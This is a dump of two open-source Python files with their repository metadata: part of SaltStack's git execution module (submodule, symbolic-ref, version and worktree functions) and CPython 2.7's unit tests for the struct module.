``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
        Key can also be specified as a SaltStack file server URL, e.g.
        ``salt://location/identity_file``
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-submodule(1)`: http://git-scm.com/docs/git-submodule
CLI Example:
.. code-block:: bash
# Update submodule and ensure it is initialized (before 2015.8.0)
salt myminion git.submodule /path/to/repo/sub/repo init=True
# Update submodule and ensure it is initialized (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo update opts='--init'
# Rebase submodule (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo update opts='--rebase'
# Add submodule (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo add opts='https://mydomain.tld/repo.git'
# Unregister submodule (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo deinit
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
init_ = kwargs.pop('init', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if init_:
raise SaltInvocationError(
'The \'init\' argument is no longer supported. Either set '
'\'command\' to \'init\', or include \'--init\' in the \'opts\' '
'argument and set \'command\' to \'update\'.'
)
if not isinstance(command, six.string_types):
command = str(command)
cmd = ['git', 'submodule', command]
cmd.extend(_format_opts(opts))
return _git_run(cmd,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
def symbolic_ref(cwd,
ref,
value=None,
opts='',
user=None,
ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-symbolic-ref(1)`_
cwd
The path to the git checkout
ref
Symbolic ref to read/modify
value
If passed, then the symbolic ref will be set to this value and an empty
string will be returned.
If not passed, then the ref to which ``ref`` points will be returned,
unless ``--delete`` is included in ``opts`` (in which case the symbolic
ref will be deleted).
opts
Any additional options to add to the command line, in a single string
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-symbolic-ref(1)`: http://git-scm.com/docs/git-symbolic-ref
CLI Examples:
.. code-block:: bash
# Get ref to which HEAD is pointing
salt myminion git.symbolic_ref /path/to/repo HEAD
# Set/overwrite symbolic ref 'FOO' to local branch 'foo'
salt myminion git.symbolic_ref /path/to/repo FOO refs/heads/foo
# Delete symbolic ref 'FOO'
salt myminion git.symbolic_ref /path/to/repo FOO opts='--delete'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'symbolic-ref']
opts = _format_opts(opts)
if value is not None and any(x in opts for x in ('-d', '--delete')):
raise SaltInvocationError(
'Value cannot be set for symbolic ref if -d/--delete is included '
'in opts'
)
command.extend(opts)
command.append(ref)
    if value:
        # 'value' is a single ref target; use append() here, since extending
        # a list with a string would add one list item per character
        command.append(value)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def version(versioninfo=False):
'''
.. versionadded:: 2015.8.0
Returns the version of Git installed on the minion
versioninfo : False
If ``True``, return the version in a versioninfo list (e.g. ``[2, 5,
0]``)
CLI Example:
.. code-block:: bash
salt myminion git.version
'''
contextkey = 'git.version'
contextkey_info = 'git.versioninfo'
if contextkey not in __context__:
try:
version_ = _git_run(['git', '--version'])['stdout']
except CommandExecutionError as exc:
log.error(
'Failed to obtain the git version (error follows):\n{0}'
.format(exc)
)
version_ = 'unknown'
try:
__context__[contextkey] = version_.split()[-1]
except IndexError:
# Somehow git --version returned no stdout while not raising an
# error. Should never happen but we should still account for this
# possible edge case.
log.error('Running \'git --version\' returned no stdout')
__context__[contextkey] = 'unknown'
if not versioninfo:
return __context__[contextkey]
if contextkey_info not in __context__:
# Set ptr to the memory location of __context__[contextkey_info] to
# prevent repeated dict lookups
ptr = __context__.setdefault(contextkey_info, [])
for part in __context__[contextkey].split('.'):
try:
ptr.append(int(part))
except ValueError:
ptr.append(part)
return __context__[contextkey_info]
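# Illustrative sketch (added note, not part of this module): the loop above
# converts a dotted version string into a versioninfo list, keeping any
# non-numeric parts as strings:
#
#     '2.5.0'     -> [2, 5, 0]
#     '1.8.3.rc1' -> [1, 8, 3, 'rc1']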
def worktree_add(cwd,
worktree_path,
ref=None,
reset_branch=None,
force=None,
detach=False,
opts='',
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionadded:: 2015.8.0
Interface to `git-worktree(1)`_, adds a worktree
cwd
The path to the git checkout
worktree_path
Path to the new worktree. Can be either absolute, or relative to
``cwd``.
branch
Name of new branch to create. If omitted, will be set to the basename
of the ``worktree_path``. For example, if the ``worktree_path`` is
``/foo/bar/baz``, then ``branch`` will be ``baz``.
ref
Name of the ref on which to base the new worktree. If omitted, then
        ``HEAD`` is used, and a new branch will be created, named for the
basename of the ``worktree_path``. For example, if the
``worktree_path`` is ``/foo/bar/baz`` then a new branch ``baz`` will be
created, and pointed at ``HEAD``.
reset_branch : False
If ``False``, then `git-worktree(1)`_ will fail to create the worktree
if the targeted branch already exists. Set this argument to ``True`` to
reset the targeted branch to point at ``ref``, and checkout the
newly-reset branch into the new worktree.
force : False
By default, `git-worktree(1)`_ will not permit the same branch to be
checked out in more than one worktree. Set this argument to ``True`` to
override this.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` to avoid causing errors
with Salt's own argument parsing.
All CLI options for adding worktrees as of Git 2.5.0 are already
supported by this function as of Salt 2015.8.0, so using this
argument is unnecessary unless new CLI arguments are added to
`git-worktree(1)`_ and are not yet supported in Salt.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-worktree(1)`: http://git-scm.com/docs/git-worktree
CLI Examples:
.. code-block:: bash
salt myminion git.worktree_add /path/to/repo/main ../hotfix ref=origin/master
salt myminion git.worktree_add /path/to/repo/main ../hotfix branch=hotfix21 ref=v2.1.9.3
'''
_check_worktree_support()
kwargs = salt.utils.clean_kwargs(**kwargs)
branch_ = kwargs.pop('branch', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if branch_ and detach:
raise SaltInvocationError(
'Only one of \'branch\' and \'detach\' is allowed'
)
command = ['git', 'worktree', 'add']
if detach:
if force:
log.warning(
'\'force\' argument to git.worktree_add is ignored when '
'detach=True'
)
command.append('--detach')
else:
if not branch_:
branch_ = os.path.basename(worktree_path)
command.extend(['-B' if reset_branch else '-b', branch_])
if force:
command.append('--force')
command.extend(_format_opts(opts))
if not isinstance(worktree_path, six.string_types):
worktree_path = str(worktree_path)
command.append(worktree_path)
if ref:
if not isinstance(ref, six.string_types):
ref = str(ref)
command.append(ref)
# Checkout message goes to stderr
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
redirect_stderr=True)['stdout']
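# Illustrative sketch (added note, not part of this module): the argument
# handling above yields commands such as:
#
#     worktree_add('/path/to/repo/main', '../hotfix', ref='origin/master')
#     # -> git worktree add -b hotfix ../hotfix origin/master
#     worktree_add('/path/to/repo/main', '../hotfix', ref='origin/master',
#                  detach=True)
#     # -> git worktree add --detach ../hotfix origin/master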
def worktree_prune(cwd,
dry_run=False,
verbose=True,
expire=None,
opts='',
user=None,
ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-worktree(1)`_, prunes stale worktree administrative data
from the gitdir
cwd
The path to the main git checkout or a linked worktree
dry_run : False
If ``True``, then this function will report what would have been
pruned, but no changes will be made.
verbose : True
Report all changes made. Set to ``False`` to suppress this output.
expire
Only prune unused worktree data older than a specific period of time.
The date format for this parameter is described in the documentation
for the ``gc.pruneWorktreesExpire`` config param in the
`git-config(1)`_ manpage.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` to avoid causing errors
with Salt's own argument parsing.
All CLI options for pruning worktrees as of Git 2.5.0 are already
supported by this function as of Salt 2015.8.0, so using this
argument is unnecessary unless new CLI arguments are added to
`git-worktree(1)`_ and are not yet supported in Salt.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-worktree(1)`: http://git-scm.com/docs/git-worktree
.. _`git-config(1)`: http://git-scm.com/docs/git-config/2.5.1
CLI Examples:
.. code-block:: bash
salt myminion git.worktree_prune /path/to/repo
salt myminion git.worktree_prune /path/to/repo dry_run=True
salt myminion git.worktree_prune /path/to/repo expire=1.day.ago
'''
_check_worktree_support()
cwd = _expand_path(cwd, user)
command = ['git', 'worktree', 'prune']
if dry_run:
command.append('--dry-run')
if verbose:
command.append('--verbose')
if expire:
if not isinstance(expire, six.string_types):
expire = str(expire)
command.extend(['--expire', expire])
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def worktree_rm(cwd, user=None):
'''
.. versionadded:: 2015.8.0
Recursively removes the worktree located at ``cwd``, returning ``True`` if
successful. This function will attempt to determine if ``cwd`` is actually
a worktree by invoking :py:func:`git.is_worktree
<salt.modules.git.is_worktree>`. If the path does not correspond to a
worktree, then an error will be raised and no action will be taken.
.. warning::
There is no undoing this action. Be **VERY** careful before running
this function.
cwd
Path to the worktree to be removed
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
CLI Examples:
.. code-block:: bash
salt myminion git.worktree_rm /path/to/worktree
'''
_check_worktree_support()
cwd = _expand_path(cwd, user)
if not os.path.exists(cwd):
raise CommandExecutionError(cwd + ' does not exist')
elif not is_worktree(cwd):
raise CommandExecutionError(cwd + ' is not a git worktree')
try:
salt.utils.rm_rf(cwd)
except Exception as exc:
raise CommandExecutionError(
'Unable to remove {0}: {1}'.format(cwd, exc)
)
return True
|
{
"content_hash": "2709eb1517c8e374ccfe944d0f207a8b",
"timestamp": "",
"source": "github",
"line_count": 3995,
"max_line_length": 137,
"avg_line_length": 32.858573216520654,
"alnum_prop": 0.5706787537137198,
"repo_name": "stephane-martin/salt-debian-packaging",
"id": "0eda16a68a00ef75de64fee8fd5099d5cd5a4c0c",
"size": "131294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "salt-2016.3.2/salt/modules/git.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13798"
},
{
"name": "C",
"bytes": "986"
},
{
"name": "Groff",
"bytes": "13634346"
},
{
"name": "HTML",
"bytes": "39558"
},
{
"name": "Makefile",
"bytes": "20902"
},
{
"name": "NSIS",
"bytes": "22316"
},
{
"name": "PowerShell",
"bytes": "38719"
},
{
"name": "Python",
"bytes": "40857506"
},
{
"name": "SaltStack",
"bytes": "58278"
},
{
"name": "Scheme",
"bytes": "1790"
},
{
"name": "Shell",
"bytes": "829927"
},
{
"name": "Tcl",
"bytes": "6532"
},
{
"name": "TeX",
"bytes": "11632"
}
],
"symlink_target": ""
}
|
import os
import array
import unittest
import struct
import inspect
from test import test_support as support
from test.test_support import (check_warnings, check_py3k_warnings)
import sys
ISBIGENDIAN = sys.byteorder == "big"
IS32BIT = sys.maxsize == 0x7fffffff
integer_codes = 'b', 'B', 'h', 'H', 'i', 'I', 'l', 'L', 'q', 'Q'
testmod_filename = os.path.splitext(__file__)[0] + '.py'
# Native 'q' packing isn't available on systems that don't have the C
# long long type.
try:
struct.pack('q', 5)
except struct.error:
HAVE_LONG_LONG = False
else:
HAVE_LONG_LONG = True
def string_reverse(s):
return "".join(reversed(s))
def bigendian_to_native(value):
if ISBIGENDIAN:
return value
else:
return string_reverse(value)
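# Quick illustration (added note, not part of the original tests): on a
# little-endian host, bigendian_to_native('\x02\x01') returns '\x01\x02',
# letting big-endian reference byte strings be compared against natively
# packed values.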
class StructTest(unittest.TestCase):
def check_float_coerce(self, format, number):
# SF bug 1530559. struct.pack raises TypeError where it used
# to convert.
with check_warnings((".*integer argument expected, got float",
DeprecationWarning)) as w:
got = struct.pack(format, number)
lineno = inspect.currentframe().f_lineno - 1
self.assertEqual(w.filename, testmod_filename)
self.assertEqual(w.lineno, lineno)
self.assertEqual(len(w.warnings), 1)
expected = struct.pack(format, int(number))
self.assertEqual(got, expected)
def test_isbigendian(self):
self.assertEqual((struct.pack('=i', 1)[0] == chr(0)), ISBIGENDIAN)
def test_consistence(self):
self.assertRaises(struct.error, struct.calcsize, 'Z')
sz = struct.calcsize('i')
self.assertEqual(sz * 3, struct.calcsize('iii'))
fmt = 'cbxxxxxxhhhhiillffd?'
fmt3 = '3c3b18x12h6i6l6f3d3?'
sz = struct.calcsize(fmt)
sz3 = struct.calcsize(fmt3)
self.assertEqual(sz * 3, sz3)
self.assertRaises(struct.error, struct.pack, 'iii', 3)
self.assertRaises(struct.error, struct.pack, 'i', 3, 3, 3)
self.assertRaises((TypeError, struct.error), struct.pack, 'i', 'foo')
self.assertRaises((TypeError, struct.error), struct.pack, 'P', 'foo')
self.assertRaises(struct.error, struct.unpack, 'd', 'flap')
s = struct.pack('ii', 1, 2)
self.assertRaises(struct.error, struct.unpack, 'iii', s)
self.assertRaises(struct.error, struct.unpack, 'i', s)
def test_transitiveness(self):
c = 'a'
b = 1
h = 255
i = 65535
l = 65536
f = 3.1415
d = 3.1415
t = True
for prefix in ('', '@', '<', '>', '=', '!'):
for format in ('xcbhilfd?', 'xcBHILfd?'):
format = prefix + format
s = struct.pack(format, c, b, h, i, l, f, d, t)
cp, bp, hp, ip, lp, fp, dp, tp = struct.unpack(format, s)
self.assertEqual(cp, c)
self.assertEqual(bp, b)
self.assertEqual(hp, h)
self.assertEqual(ip, i)
self.assertEqual(lp, l)
self.assertEqual(int(100 * fp), int(100 * f))
self.assertEqual(int(100 * dp), int(100 * d))
self.assertEqual(tp, t)
def test_new_features(self):
# Test some of the new features in detail
# (format, argument, big-endian result, little-endian result, asymmetric)
tests = [
('c', 'a', 'a', 'a', 0),
('xc', 'a', '\0a', '\0a', 0),
('cx', 'a', 'a\0', 'a\0', 0),
('s', 'a', 'a', 'a', 0),
('0s', 'helloworld', '', '', 1),
('1s', 'helloworld', 'h', 'h', 1),
('9s', 'helloworld', 'helloworl', 'helloworl', 1),
('10s', 'helloworld', 'helloworld', 'helloworld', 0),
('11s', 'helloworld', 'helloworld\0', 'helloworld\0', 1),
('20s', 'helloworld', 'helloworld'+10*'\0', 'helloworld'+10*'\0', 1),
('b', 7, '\7', '\7', 0),
('b', -7, '\371', '\371', 0),
('B', 7, '\7', '\7', 0),
('B', 249, '\371', '\371', 0),
('h', 700, '\002\274', '\274\002', 0),
('h', -700, '\375D', 'D\375', 0),
('H', 700, '\002\274', '\274\002', 0),
('H', 0x10000-700, '\375D', 'D\375', 0),
('i', 70000000, '\004,\035\200', '\200\035,\004', 0),
('i', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('I', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('I', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('l', 70000000, '\004,\035\200', '\200\035,\004', 0),
('l', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('L', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('L', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('f', 2.0, '@\000\000\000', '\000\000\000@', 0),
('d', 2.0, '@\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000@', 0),
('f', -2.0, '\300\000\000\000', '\000\000\000\300', 0),
('d', -2.0, '\300\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000\300', 0),
('?', 0, '\0', '\0', 0),
('?', 3, '\1', '\1', 1),
('?', True, '\1', '\1', 0),
('?', [], '\0', '\0', 1),
('?', (1,), '\1', '\1', 1),
]
for fmt, arg, big, lil, asy in tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res, exp)
self.assertEqual(struct.calcsize(xfmt), len(res))
rev = struct.unpack(xfmt, res)[0]
if rev != arg:
self.assertTrue(asy)
def test_calcsize(self):
expected_size = {
'b': 1, 'B': 1,
'h': 2, 'H': 2,
'i': 4, 'I': 4,
'l': 4, 'L': 4,
'q': 8, 'Q': 8,
}
# standard integer sizes
for code in integer_codes:
for byteorder in ('=', '<', '>', '!'):
format = byteorder+code
size = struct.calcsize(format)
self.assertEqual(size, expected_size[code])
# native integer sizes, except 'q' and 'Q'
for format_pair in ('bB', 'hH', 'iI', 'lL'):
for byteorder in ['', '@']:
signed_size = struct.calcsize(byteorder + format_pair[0])
unsigned_size = struct.calcsize(byteorder + format_pair[1])
self.assertEqual(signed_size, unsigned_size)
# bounds for native integer sizes
self.assertEqual(struct.calcsize('b'), 1)
self.assertLessEqual(2, struct.calcsize('h'))
self.assertLessEqual(4, struct.calcsize('l'))
self.assertLessEqual(struct.calcsize('h'), struct.calcsize('i'))
self.assertLessEqual(struct.calcsize('i'), struct.calcsize('l'))
# tests for native 'q' and 'Q' when applicable
if HAVE_LONG_LONG:
self.assertEqual(struct.calcsize('q'), struct.calcsize('Q'))
self.assertLessEqual(8, struct.calcsize('q'))
self.assertLessEqual(struct.calcsize('l'), struct.calcsize('q'))
def test_integers(self):
# Integer tests (bBhHiIlLqQ).
import binascii
class IntTester(unittest.TestCase):
def __init__(self, format):
super(IntTester, self).__init__(methodName='test_one')
self.format = format
self.code = format[-1]
self.direction = format[:-1]
if not self.direction in ('', '@', '=', '<', '>', '!'):
raise ValueError("unrecognized packing direction: %s" %
self.direction)
self.bytesize = struct.calcsize(format)
self.bitsize = self.bytesize * 8
if self.code in tuple('bhilq'):
self.signed = True
self.min_value = -(2L**(self.bitsize-1))
self.max_value = 2L**(self.bitsize-1) - 1
elif self.code in tuple('BHILQ'):
self.signed = False
self.min_value = 0
self.max_value = 2L**self.bitsize - 1
else:
raise ValueError("unrecognized format code: %s" %
self.code)
def test_one(self, x, pack=struct.pack,
unpack=struct.unpack,
unhexlify=binascii.unhexlify):
format = self.format
if self.min_value <= x <= self.max_value:
expected = long(x)
if self.signed and x < 0:
expected += 1L << self.bitsize
self.assertGreaterEqual(expected, 0)
expected = '%x' % expected
if len(expected) & 1:
expected = "0" + expected
expected = unhexlify(expected)
expected = ("\x00" * (self.bytesize - len(expected)) +
expected)
if (self.direction == '<' or
self.direction in ('', '@', '=') and not ISBIGENDIAN):
expected = string_reverse(expected)
self.assertEqual(len(expected), self.bytesize)
# Pack work?
got = pack(format, x)
self.assertEqual(got, expected)
# Unpack work?
retrieved = unpack(format, got)[0]
self.assertEqual(x, retrieved)
# Adding any byte should cause a "too big" error.
self.assertRaises((struct.error, TypeError), unpack, format,
'\x01' + got)
else:
# x is out of range -- verify pack realizes that.
self.assertRaises((OverflowError, ValueError, struct.error),
pack, format, x)
def run(self):
from random import randrange
# Create all interesting powers of 2.
values = []
for exp in range(self.bitsize + 3):
values.append(1L << exp)
# Add some random values.
for i in range(self.bitsize):
val = 0L
for j in range(self.bytesize):
val = (val << 8) | randrange(256)
values.append(val)
# Values absorbed from other tests
values.extend([300, 700000, sys.maxint*4])
# Try all those, and their negations, and +-1 from
# them. Note that this tests all power-of-2
# boundaries in range, and a few out of range, plus
# +-(2**n +- 1).
for base in values:
for val in -base, base:
for incr in -1, 0, 1:
x = val + incr
self.test_one(int(x))
self.test_one(long(x))
# Some error cases.
class NotAnIntNS(object):
def __int__(self):
return 42
def __long__(self):
return 1729L
class NotAnIntOS:
def __int__(self):
return 85
def __long__(self):
return -163L
# Objects with an '__index__' method should be allowed
                # to pack as integers. That is assuming the implemented
                # '__index__' method returns an 'int' or 'long'.
class Indexable(object):
def __init__(self, value):
self._value = value
def __index__(self):
return self._value
                # If the '__index__' method raises a TypeError, then
                # '__int__' should be used with a deprecation warning.
class BadIndex(object):
def __index__(self):
raise TypeError
def __int__(self):
return 42
self.assertRaises((TypeError, struct.error),
struct.pack, self.format,
"a string")
self.assertRaises((TypeError, struct.error),
struct.pack, self.format,
randrange)
with check_warnings(("integer argument expected, "
"got non-integer", DeprecationWarning)):
with self.assertRaises((TypeError, struct.error)):
struct.pack(self.format, 3+42j)
# an attempt to convert a non-integer (with an
# implicit conversion via __int__) should succeed,
# with a DeprecationWarning
for nonint in NotAnIntNS(), NotAnIntOS(), BadIndex():
with check_warnings((".*integer argument expected, got non"
"-integer", DeprecationWarning)) as w:
got = struct.pack(self.format, nonint)
lineno = inspect.currentframe().f_lineno - 1
self.assertEqual(w.filename, testmod_filename)
self.assertEqual(w.lineno, lineno)
self.assertEqual(len(w.warnings), 1)
expected = struct.pack(self.format, int(nonint))
self.assertEqual(got, expected)
# Check for legitimate values from '__index__'.
for obj in (Indexable(0), Indexable(10), Indexable(17),
Indexable(42), Indexable(100), Indexable(127)):
try:
struct.pack(format, obj)
except:
self.fail("integer code pack failed on object "
"with '__index__' method")
# Check for bogus values from '__index__'.
for obj in (Indexable('a'), Indexable(u'b'), Indexable(None),
Indexable({'a': 1}), Indexable([1, 2, 3])):
self.assertRaises((TypeError, struct.error),
struct.pack, self.format,
obj)
byteorders = '', '@', '=', '<', '>', '!'
for code in integer_codes:
for byteorder in byteorders:
if (byteorder in ('', '@') and code in ('q', 'Q') and
not HAVE_LONG_LONG):
continue
format = byteorder+code
t = IntTester(format)
t.run()
def test_p_code(self):
# Test p ("Pascal string") code.
for code, input, expected, expectedback in [
('p','abc', '\x00', ''),
('1p', 'abc', '\x00', ''),
('2p', 'abc', '\x01a', 'a'),
('3p', 'abc', '\x02ab', 'ab'),
('4p', 'abc', '\x03abc', 'abc'),
('5p', 'abc', '\x03abc\x00', 'abc'),
('6p', 'abc', '\x03abc\x00\x00', 'abc'),
('1000p', 'x'*1000, '\xff' + 'x'*999, 'x'*255)]:
got = struct.pack(code, input)
self.assertEqual(got, expected)
(got,) = struct.unpack(code, got)
self.assertEqual(got, expectedback)
def test_705836(self):
# SF bug 705836. "<f" and ">f" had a severe rounding bug, where a carry
# from the low-order discarded bits could propagate into the exponent
# field, causing the result to be wrong by a factor of 2.
import math
for base in range(1, 33):
# smaller <- largest representable float less than base.
delta = 0.5
while base - delta / 2.0 != base:
delta /= 2.0
smaller = base - delta
# Packing this rounds away a solid string of trailing 1 bits.
packed = struct.pack("<f", smaller)
unpacked = struct.unpack("<f", packed)[0]
# This failed at base = 2, 4, and 32, with unpacked = 1, 2, and
# 16, respectively.
self.assertEqual(base, unpacked)
bigpacked = struct.pack(">f", smaller)
self.assertEqual(bigpacked, string_reverse(packed))
unpacked = struct.unpack(">f", bigpacked)[0]
self.assertEqual(base, unpacked)
# Largest finite IEEE single.
big = (1 << 24) - 1
big = math.ldexp(big, 127 - 23)
packed = struct.pack(">f", big)
unpacked = struct.unpack(">f", packed)[0]
self.assertEqual(big, unpacked)
# The same, but tack on a 1 bit so it rounds up to infinity.
big = (1 << 25) - 1
big = math.ldexp(big, 127 - 24)
self.assertRaises(OverflowError, struct.pack, ">f", big)
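    # Note (added for clarity): the delta-halving loop in test_705836
    # computes the largest double strictly below ``base``; packing it as a
    # single-precision float discards a long run of trailing 1 bits, and a
    # carry out of those bits is what corrupted the exponent in bug 705836.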
def test_1530559(self):
# SF bug 1530559. struct.pack raises TypeError where it used to convert.
for endian in ('', '>', '<'):
for fmt in integer_codes:
self.check_float_coerce(endian + fmt, 1.0)
self.check_float_coerce(endian + fmt, 1.5)
def test_unpack_from(self, cls=str):
data = cls('abcd01234')
fmt = '4s'
s = struct.Struct(fmt)
self.assertEqual(s.unpack_from(data), ('abcd',))
self.assertEqual(struct.unpack_from(fmt, data), ('abcd',))
for i in xrange(6):
self.assertEqual(s.unpack_from(data, i), (data[i:i+4],))
self.assertEqual(struct.unpack_from(fmt, data, i), (data[i:i+4],))
for i in xrange(6, len(data) + 1):
self.assertRaises(struct.error, s.unpack_from, data, i)
self.assertRaises(struct.error, struct.unpack_from, fmt, data, i)
def test_pack_into(self):
test_string = 'Reykjavik rocks, eow!'
writable_buf = array.array('c', ' '*100)
fmt = '21s'
s = struct.Struct(fmt)
# Test without offset
s.pack_into(writable_buf, 0, test_string)
from_buf = writable_buf.tostring()[:len(test_string)]
self.assertEqual(from_buf, test_string)
# Test with offset.
s.pack_into(writable_buf, 10, test_string)
from_buf = writable_buf.tostring()[:len(test_string)+10]
self.assertEqual(from_buf, test_string[:10] + test_string)
# Go beyond boundaries.
small_buf = array.array('c', ' '*10)
self.assertRaises((ValueError, struct.error), s.pack_into, small_buf, 0,
test_string)
self.assertRaises((ValueError, struct.error), s.pack_into, small_buf, 2,
test_string)
# Test bogus offset (issue 3694)
sb = small_buf
self.assertRaises((TypeError, struct.error), struct.pack_into, b'', sb,
None)
def test_pack_into_fn(self):
test_string = 'Reykjavik rocks, eow!'
writable_buf = array.array('c', ' '*100)
fmt = '21s'
pack_into = lambda *args: struct.pack_into(fmt, *args)
# Test without offset.
pack_into(writable_buf, 0, test_string)
from_buf = writable_buf.tostring()[:len(test_string)]
self.assertEqual(from_buf, test_string)
# Test with offset.
pack_into(writable_buf, 10, test_string)
from_buf = writable_buf.tostring()[:len(test_string)+10]
self.assertEqual(from_buf, test_string[:10] + test_string)
# Go beyond boundaries.
small_buf = array.array('c', ' '*10)
self.assertRaises((ValueError, struct.error), pack_into, small_buf, 0,
test_string)
self.assertRaises((ValueError, struct.error), pack_into, small_buf, 2,
test_string)
def test_unpack_with_buffer(self):
with check_py3k_warnings(("buffer.. not supported in 3.x",
DeprecationWarning)):
# SF bug 1563759: struct.unpack doesn't support buffer protocol objects
data1 = array.array('B', '\x12\x34\x56\x78')
data2 = buffer('......\x12\x34\x56\x78......', 6, 4)
for data in [data1, data2]:
value, = struct.unpack('>I', data)
self.assertEqual(value, 0x12345678)
self.test_unpack_from(cls=buffer)
def test_unpack_with_memoryview(self):
# Bug 10212: struct.unpack doesn't support new buffer protocol objects
data1 = memoryview('\x12\x34\x56\x78')
for data in [data1,]:
value, = struct.unpack('>I', data)
self.assertEqual(value, 0x12345678)
self.test_unpack_from(cls=memoryview)
def test_bool(self):
class ExplodingBool(object):
def __nonzero__(self):
raise IOError
for prefix in tuple("<>!=")+('',):
false = (), [], [], '', 0
true = [1], 'test', 5, -1, 0xffffffffL+1, 0xffffffff//2
falseFormat = prefix + '?' * len(false)
packedFalse = struct.pack(falseFormat, *false)
unpackedFalse = struct.unpack(falseFormat, packedFalse)
trueFormat = prefix + '?' * len(true)
packedTrue = struct.pack(trueFormat, *true)
unpackedTrue = struct.unpack(trueFormat, packedTrue)
self.assertEqual(len(true), len(unpackedTrue))
self.assertEqual(len(false), len(unpackedFalse))
for t in unpackedFalse:
self.assertFalse(t)
for t in unpackedTrue:
self.assertTrue(t)
packed = struct.pack(prefix+'?', 1)
self.assertEqual(len(packed), struct.calcsize(prefix+'?'))
if len(packed) != 1:
self.assertFalse(prefix, msg='encoded bool is not one byte: %r'
%packed)
self.assertRaises(IOError, struct.pack, prefix + '?',
ExplodingBool())
for c in [b'\x01', b'\x7f', b'\xff', b'\x0f', b'\xf0']:
self.assertTrue(struct.unpack('>?', c)[0])
@unittest.skipUnless(IS32BIT, "Specific to 32bit machines")
def test_crasher(self):
self.assertRaises(MemoryError, struct.pack, "357913941c", "a")
def test_count_overflow(self):
hugecount = '{}b'.format(sys.maxsize+1)
self.assertRaises(struct.error, struct.calcsize, hugecount)
hugecount2 = '{}b{}H'.format(sys.maxsize//2, sys.maxsize//2)
self.assertRaises(struct.error, struct.calcsize, hugecount2)
def check_sizeof(self, format_str, number_of_codes):
# The size of 'PyStructObject'
totalsize = support.calcobjsize('5P')
# The size taken up by the 'formatcode' dynamic array
totalsize += struct.calcsize('3P') * (number_of_codes + 1)
support.check_sizeof(self, struct.Struct(format_str), totalsize)
@support.cpython_only
def test__sizeof__(self):
for code in integer_codes:
self.check_sizeof(code, 1)
self.check_sizeof('BHILfdspP', 9)
self.check_sizeof('B' * 1234, 1234)
self.check_sizeof('fd', 2)
self.check_sizeof('xxxxxxxxxxxxxx', 0)
self.check_sizeof('100H', 100)
self.check_sizeof('187s', 1)
self.check_sizeof('20p', 1)
self.check_sizeof('0s', 1)
self.check_sizeof('0c', 0)
def test_main():
support.run_unittest(StructTest)
if __name__ == '__main__':
test_main()
|
{
"content_hash": "faf78d619d99d3d0012637902eacd060",
"timestamp": "",
"source": "github",
"line_count": 581,
"max_line_length": 84,
"avg_line_length": 41.5645438898451,
"alnum_prop": 0.4938506770466686,
"repo_name": "Sing-Li/go-buildpack",
"id": "2e613f7577bb79a91736c55c01d863762c3f74d3",
"size": "24149",
"binary": false,
"copies": "38",
"ref": "refs/heads/master",
"path": "builds/runtimes/python-2.7.6/lib/python2.7/test/test_struct.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "247"
},
{
"name": "C",
"bytes": "478618"
},
{
"name": "C++",
"bytes": "2005"
},
{
"name": "Go",
"bytes": "1710"
},
{
"name": "Groff",
"bytes": "43767"
},
{
"name": "HTML",
"bytes": "111577"
},
{
"name": "Makefile",
"bytes": "66321"
},
{
"name": "Python",
"bytes": "16829300"
},
{
"name": "R",
"bytes": "2326"
},
{
